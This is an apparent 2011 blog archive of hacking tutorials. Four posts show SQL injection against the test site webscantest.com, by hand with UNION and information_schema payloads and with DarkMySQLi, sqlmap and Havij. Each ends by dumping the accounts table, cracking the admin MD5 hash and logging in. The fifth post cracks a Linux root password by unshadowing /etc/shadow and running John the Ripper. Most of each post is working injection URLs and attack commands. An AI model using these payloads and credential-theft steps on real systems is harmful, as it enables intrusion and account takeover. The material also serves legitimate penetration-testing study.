Saturday, June 25, 2011

MySQL 5.0 --> Should've Used Is_Numeric()

Hello, and welcome to my guide on manual SQL Injection against MySQL 5.0 servers. This will cover basic injection, all the way from finding a vulnerable target to dumping rows of data from a database. You will also use a couple of SQL requests and functions, and actually get a grasp of what a table looks like. Furthermore, every hacker should be able to exploit these vulnerabilities manually, whether it be incorrect type handling or incorrectly filtered escape characters (these types of vulnerabilities are generally what opens the door for injection).


When injection occurs, rows of data are dumped from a column, which is grouped with a bunch of other columns inside a table, which is grouped with a bunch of other tables inside a database, which is grouped with a bunch of other databases inside a server. Whoa! That probably sounded like a bunch of bullshit, huh? Well, you should have a basic understanding by the end of the tutorial. Have you ever seen a spreadsheet? Think of that as a table. Think of a bunch of those as a database.

Firstly, you should make sure you have the prerequisites, just like any other guide I have written. Fortunately for you, all you need is an Internet connection and a web browser. I don't care if you run Linux, Windows, or Mac (eeeewwwww).

Like most of the guides about web application penetration testing, we are going to use the following target-

http://www.webscantest.com/

Just for the hell of it, I'm going to use Linux for this tutorial, just because I feel like it. :D

Now then, the vulnerable page is here-

http://webscantest.com/datastore/search_get_by_id.php?id=4

When you navigate to it, you should see this-













Looks like a normal page, right? Let's test for vulnerability by adding a ' (apostrophe) to the end of the url-

http://webscantest.com/datastore/search_get_by_id.php?id=4'

Here is the output-













Hmm. Looks like we have an SQL error. Now let's think to ourselves for a minute. The error clearly states we have an error in our SQL syntax. If we weren't able to make actual queries to the database, why would we be told to use proper syntax in the first place? This is how we confirm vulnerability, at least to some extent. But what is happening when we add the apostrophe to the end of the URL? Well, in the first screenshot, the id parameter returned a value of 4. When we added an apostrophe, we were assigning a non-numeric value to the id parameter. This means that the parameter is not checking for numeric values. If we can return more than just a number, why not return tables and columns?

Well, let's find our column count. To do this, we will use order by. We will increment by 1 until we get an error.

First type-

http://webscantest.com/datastore/search_get_by_id.php?id=4 order by 1--


No error, right? Let's speed it up now. Instead of incrementing by 1, let's go to 5-


http://webscantest.com/datastore/search_get_by_id.php?id=4 order by 5--

Whoops. We got another syntax error. Well, since we know the column count is less than 5 but greater than 1 (because we didn't get an error on one), let's increment backwards by 1-

http://webscantest.com/datastore/search_get_by_id.php?id=4 order by 4--

Alright, no error. Since we got an error on 5 but not on 4, the column count is 4.

Now we're going to use the union method. This will help us enumerate the database, and also find injectable columns we can use-

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,2,3,4--

Here is the output-












 All of a sudden we see another little addition to the web page. We see a 1,2, and 3 that weren't there before. Now we have columns to inject. Lets enumerate!

Let's find the version of the database. The column I'm going to inject inside of is 2-

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,version(),3,4--

Here is my output-












Now, instead of a 2, we see the version of the database. Let's find the name of the database-

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,database(),3,4--



Instead of a database version, we see the actual name of the database, which is scanme. What about the database user?

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,user(),3,4--

We now know that the user for the scanme database is scanme@localhost. This kind of information can be useful for further penetration testing of the target. But now we want all of the tables from the database. Since the database version is <= 5.0, we can use information_schema. Information_schema is pretty much the information database, which stores information about all the other databases maintained by the MySQL server. Let's try it-

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,table_name,3,4 from information_schema.tables--

Here is the output-












Most of the tables we see appear are for the information_schema database. But we see two that look out of the ordinary in comparison to the others when we scroll to the bottom of the page, as seen in the output- accounts and inventory. We are going to want to dump the columns from the accounts table, because why do we care what they have in stock?

To do this, we need to convert the table name accounts to ascii. You can go online and find a converter, or use a built-in encoder in a tool like WebSlayer. We are going to use the char() function, with the ascii values of each character of the "accounts" table name as the function's parameter. This is how we do it-

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,column_name,3,4 from information_schema.columns where table_name= char(97,99,99,111,117,110,116,115)


Here is the output-

 










From these columns we are going to dump the data from the uname and passwd columns. Let's do it-

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,concat(uname,0x3a,passwd),3,4 from accounts--

This MySQL query will give us output like so-














We now have the usernames and passwords stored in the database. These are usually displayed in order of the query we provide, which would be uname:passwd. We have the passwords, true, but they are hashed. Lets crack em!





















As we can see from our lcrack output, the username is admin and the password is admin.

Thus we have successfully exploited the MySQL server.

Happy Hacking!

Sunday, June 19, 2011

John The Ripper- Destroying Passwords The Penguin Way

Hello, and welcome to my guide on using John The Ripper. Today we will be cracking our own Linux password. Now before you get all jumpy and excited about what you are going to learn, let me just say this- THE CAPABILITIES OF ANY PASSWORD CRACKING TOOL ARE ONLY AS GOOD AS YOUR WORDLIST. In other words, if you have a wordlist with 5 words in it, don't expect to crack anything. It would be like trying to drive a car without a motor. If you have no idea what a wordlist is, then I'll tell you- a wordlist, or a dictionary file, is merely a .txt or .lst (these are usually the file formats) file with a bunch of words in it. On every line of the file there is only one word. Then on the next line, there is another word. Parsing these kinds of files is easy- any high level programming/scripting language can usually due this by using the .readline() method or something similar, then replacing the line that was just read with a .replace() method, or something similar.

Here are some things you will probably need or want to have for this guide-

--> BackTrack 5 (or another Linux distro, preferably Ubuntu/Xubuntu/Kubuntu)
--> John The Ripper
--> Some way to generate a hash (online hash generator, WebSlayer, or something of the sort.)

I highly recommend using BackTrack 5. If for some reason you can't use it or just don't like it, take a look at Blackbuntu.

The first thing we're going to do is crack our own Linux password. If you are using BackTrack 5, and you haven't changed your password, the password is toor (we are using the root account). Let's get started!


To use see all the available options to use with John The Ripper, simply type john in your Terminal. Read through all the options. This is the best way to learn how penetration testing tools work, and most of the time you will learn something important from learning how to use even one kind of switch or parameter. doing a couple things with this tool, including cracking Linux passwords and a couple other hash types.

Since we're cracking our own Linux password, we have to change directories to our /etc/ directory. In this directory, we can take a look at our passwd file. To do this, we can use any text editor we want. I'm just going to use cat. Here's what you should see-

















If you have no idea how to read through this format, let me teach you. Let's just take the line from the root account and look at it-

root:x:0:0:root:/root:/bin/bash

If it looks a little confusing, don't worry, because once you understand it you can breeze right through through the whole passwd file. So lets break it down-

root --> This is the username field.

x --> This is the password field.

0 --> The User ID (UID) field.

0 --> The Group ID field.

root --> The User ID Information field. This field is used for comments and whatnot.

/root --> The Home Directory for the user.

/bin/bash --> This is the absolute path for a command shell. It doesn't have to be a command shell, but it usually is.


So now, after looking at the above explanation, your wondering why the password field has an x. This is because the password is shadowed. This is done by the implementation of the /etc/shadow file. The shadow file holds the actual encrypted password, but no regular user is allowed to see it. If we had access to it (which we do, if you are using BackTrack), we wouldn't need to use the /etc/passwd file. But the whole point of this guide is to teach some small part of privilege escalation, so we have to pretend we aren't root yet. But if we don't have access to the /etc/shadow file, and the password field of the /etc/passwd file holds just an x, then how do we get the encrypted password? We have to unshadow the password field. Then we will see the same hash in the passwd file that is stored in the shadow file. To unshadow the password field, we will use the unshadow utility implemented in John The Ripper. To do this, navigate to the directory you have John The Ripper installed, then type-

./unshadow /etc/passwd /etc/shadow


Here is the output-

















As you can see, we now have the encrypted password. The only thing left to do is crack this password with John The Ripper.

What we're going to do is pass the username and encrypted password into a text file. This text file needs to be in the same directory as John The Ripper. So copy the first two fields of the root account, and put them in a text file. This is what it should look like-
















I will save the file as crackme.txt

Now that we have our file ready, let's crack the hash!

There are two methods of cracking this hash. Firstly, we will use our wordlist. We talked about these, remember? John The Ripper has it's own wordlist, called password.lst, so don't worry if you think you don't have one. The other method will be by using a bruteforce attack (--incremental). First, the dictionary attack-

./john --wordlist=password.lst crackme.txt

Here's the output-
















As you can see, John The Ripper detected what type of hash we were cracking, and returned the plain text of the username and password. Cool! Now let's try to bruteforce the password. This can be done with the --single option-

./john --single crackme.txt

Here's the output-
















If we want, we can specify the --incremental option, which is just like the --single option, except we can define what kind of mode we want to use, which determines what kind of character set we are using.

TROUBLESHOOTING-

Q- I get the following error- "No password hashes loaded".

A- This is probably due to the fact that John The Ripper has already cracked the hash you are trying to crack. If you want to crack the same hash again, delete the john.pot file.



Q- John The Ripper didn't crack my password. What the hell?

A- WHY DID YOU PICK SUCH A STRONG PASSWORD?! Just kidding, good job on taking your security seriously. There are two solutions to this problem- either put your password in the wordlist (password.lst), or change your password to something stupid (just for this guide). If you choose the latter, make sure you change your password back to what it was.

HAPPY HACKING!

Saturday, June 11, 2011

DarkMySQLi - A MySQL Injection Script For Penetration Testers

Hello, and welcome to my guide on basic usage of DarkMySQLi, a great tool for injecting MySQL databases. This guide will go from detecting a vulnerable MySQL database server to successful exploitation of the actual database with this tool. As always, we will be using the ever-so-vulnerable test website-

http://www.webscantest.com/

Requirements for this guide are-

-->BackTrack 5
-->DarkMySQLi
-->An Internet connection

The actual URL we will be navigating to is-

http://www.webscantest.com/datastore/search_get_by_id.php?id=4

From this URL we can see the the id parameter returns an integer value of 4.

Here's what the web page looks like-

















If you want to check for vulnerability, then just add an apostrophe to the end of the URL, like so-


http://www.webscantest.com/datastore/search_get_by_id.php?id=4'


This is what the page will look like once you execute this request-














From this error, we can see that we are using incorrect syntax for the query we are sending to the database. We also know from this error that the remote database server is MySQL. Now we can fire up DarkMySQLi and attack the database.


First we need to find the number of columns in the database. To do this, we will use this command-

python DarkMySQLi.py -u http://www.webscantest.com/datastore/search_get_by_id.php?id=4 --findcol


Here is the output for the above command-
















From the output we can see that the column length is 4. But we also see two URL's- the actual URL used to enumerate the column length, and a URL generated by DarkMySQLi. The DarkMySQLi URL is the URL we will use for this tool. If you want to browse to the real URL, hold down Ctrl and click the real URL inside your Terminal window (not the DarkMySQLi URL).

Now we want to find all the tables of the database. We can do this easily with the --full option, which will help us enumerate everything we can. To do this, type-

python ./DarkMySQLi.py -u http://www.webscantest.com/datastore/search_get_by_id.php?id=4+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de-- --full


This command will enumerate everything possible. This switch (--full) only works for MySQL v5.0 and above. :)

Here is the output-















Now we have the name of the database, the names of all the tables in the database, and the names of all the columns for each table. I am going to
gather all the data from the accounts table with the following command-

python ./DarkMySQLi.py -u http://www.webscantest.com/datastore/search_get_by_id.php?id=4+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de-- -D scanme -T accounts -C id,uname,passwd,fname,lname --dump

It's a rather long command, but it will extract all data from the database. Here is the output-















From the output shown above, we have successfully extracted all data from the database. It takes a couple seconds, but you should be able to read the output just fine.

Now think about the order of the command you used. If we listed id,uname,passwd,fname, and lname (in that order), then the output will be in the same order. This means that if the first row of data looks like this-

1:admin:21232f297a57a5a743894a0e4a801fc3


then the id is 1, the uname is admin, and the passwd is 21232f297a57a5a743894a0e4a801fc3. Looks like an MD5 hash. Let's save it to a text file and crack it with lcrack-
















From the output of lcrack, the username is admin (duh) and the password is admin. Navigate to-

http://www.webscantest.com/login.php

and log in with the username admin and the password admin. Happy Hacking! :)


(To download lcrack, type in apt-get install lcrack)

Friday, June 10, 2011

Sqlmap- SQL Injection for Penguins

Hello, and welcome to my guide to basic usage of sqlmap. For this guide, I will be using BackTrack 5 as my Linux distribution, but you can compile the tool yourself in another Linux distribution or in Windows with Cygwin. You can download it here-

http://sqlmap.sourceforge.net/


For this tutorial, our target will be-

http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake


Now then, let's fire up sqlmap and get started.


First of all, the web page you are viewing should look like this-
















If you are not seeing the above web page, check the URL you entered and make sure you are connected to the Internet. At this point, we know that the Get parameter "name" is returning a value of Rake. We will us an apostrophe as a test for an SQL vulnerability in the database server. Now our URL should look like this-

http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake'

Reload the web page, and view the output, which should look like this-















From the above output of the web page, we can assume poorly written SQL code was written for a MySQL database server, and that it is indeed vulnerable.

At this point we can attack the database server using sqlmap. So fire up sqlmap in your terminal and type-


./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake


Your output for this command will look like this-

















From the output of sqlmap, we know that it is possible to inject SQL queries using sqlmap. Now we need to find all the databases. To do this, type-

./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake --dbs

This command will enumerate all databases in the MySQL server. This should be your output-















From this output, we can see two databases-

scanme
information_schema

 

Now we will enumerate all the tables within the scanme database. To do this, type-

./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake -D scanme --tables

Here is the output-
















This may be me, but I am willing to bet that user credentials are going to be found in the accounts table. Let's find out-

./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake -D scanme -T accounts --columns

 

And here's the output-

















From this output we can see that there are 5 columns-

fname
id
lname
passwd
uname

 

Now we can dump all the rows of data from whatever columns we want. Let's dump all of it, shall we?

./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake -D scanme -T accounts --dump


Here is the output-
















Hmm. Our output tells us that sqlmap recognized some hash values, more likely than not from the passwd column. At least security for the MySQL server isn't totally worthless.... Oh well. Let's use sqlmap's built in password cracking utility that can crack the hashes by collision, such as hash values implementing the MD5 algorithm. So as an answer to sqlmap's question, type Y select the default wordlist for the password utility by hitting Enter, and enter N (we don't yet need any password suffixes)-
















From the output, the hash values have been cracked, and we have privileges for all users, including admin. Now browse to-

http://www.webscantest.com/login.php



From here you can login as admin. Happy hacking!

Monday, June 6, 2011

Havij- SQL Injection For Script Kiddies

Today I am going to be talking about a very awesome SQL injection tool, Havij. I will be honest, this tool is insanely script kiddie, as in the only thing I have to worry about is whether my index finger hurts from clicking a few times. But seriously, this tool is no joke. Besides being able to extract data from MySQL databases with ease, it will also find administrator login pages, crack MD5 hashes, and even give you a command shell on Microsoft SQL Databases. It has Error Base, Time Based, and Blind database settings, and uses GET and POST methods with Integer and String injection. It's very useful for penetration testing, and even if it doesn't actually do the work for you, well, you can do it manually, right?

So, to follow this tutorial, you will need a Windows machine, Havij (duh), and access to the Internet. Do you have all of that? Good. Let the hacking begin!

So fire up Havij. You should see something like this (click on the image to enlarge)-


























Looks pretty script kiddie, doesn't it? Now for our target URL. I am going to be using a great site for web app pentesting, which you can find here-


http://www.webscantest.com/

The vulnerable page we will be using is here-


http://webscantest.com/datastore/search_get_by_id.php?id=3

Copy the above URL and paste it into the Target field of Havij. Now click Analyze. You will see something like this-

























In the bottom scroll box of Havij, you can see the Injection Type, the database server version, the current database, and whether the target is vulnerable or not (in this case, it is). =)

 
Now click on the Tables button. You will see this-

























Now click on the Get DB's button. In the left list box, you should see another database appear, called information_schema. You do not need to toggle this database unless you want to, because more likely than not, all the important tables, columns, and rows of data are in the scanme database.

Now you will need to click the Get Tables button (make sure you have the scanme database checked off). You will then get some output like this-



























Now, as you can see in the left list box, we have extracted two tables from the scanme database- inventory and accounts. I don't care what they're selling, I just want privileges! So check off the accounts table (you can also check off the inventory table if you want to).

Now we want to extract columns from our table. After you have checked off the accounts table, click Get Columns. You will then see this-


























Cool! We can see 5 columns we extracted from the accounts table. The names of these are-

--> lname
--> fname
--> passwd
--> uname
--> id


From this point on, we can now extract the data from all of these columns. Check off the ones you want to extract data from (I will just check them all off), and now we can get some account credentials!

























As you can see, we have administrator credentials. But wait! An MD5 hash! Well, there is an MD5 cracking utility built into Havij.....

Yeah, lets use it. You see, the MD5 cracker in Havij is not actually implemented into Havij. Havij simply passes the MD5 hash to a bunch of different online MD5 crackers. The way to do this is simple- scroll your mouse over the MD5 hash you see in the output of the data dump we did from the passwd column (we are cracking the admin hash), and double click. The hash should be highlighted, so right-click and copy it (Ctrl-C). Then click on the MD5 button. Simply paste the hash you copied earlier into the MD5 hash text box, and click Start. Havij will then pass our MD5 hash to a bunch of MD5 cracking websites. When all is said and done, you will see this-
























According to the output, the plain text of our MD5 hash is admin. Now navigate to the login page of our vulnerable site-


http://www.webscantest.com/login.php

In the Login: field, we will use our uname, which is admin. And for the Password: field, we will use our password, which is admin.

Happy Hacking!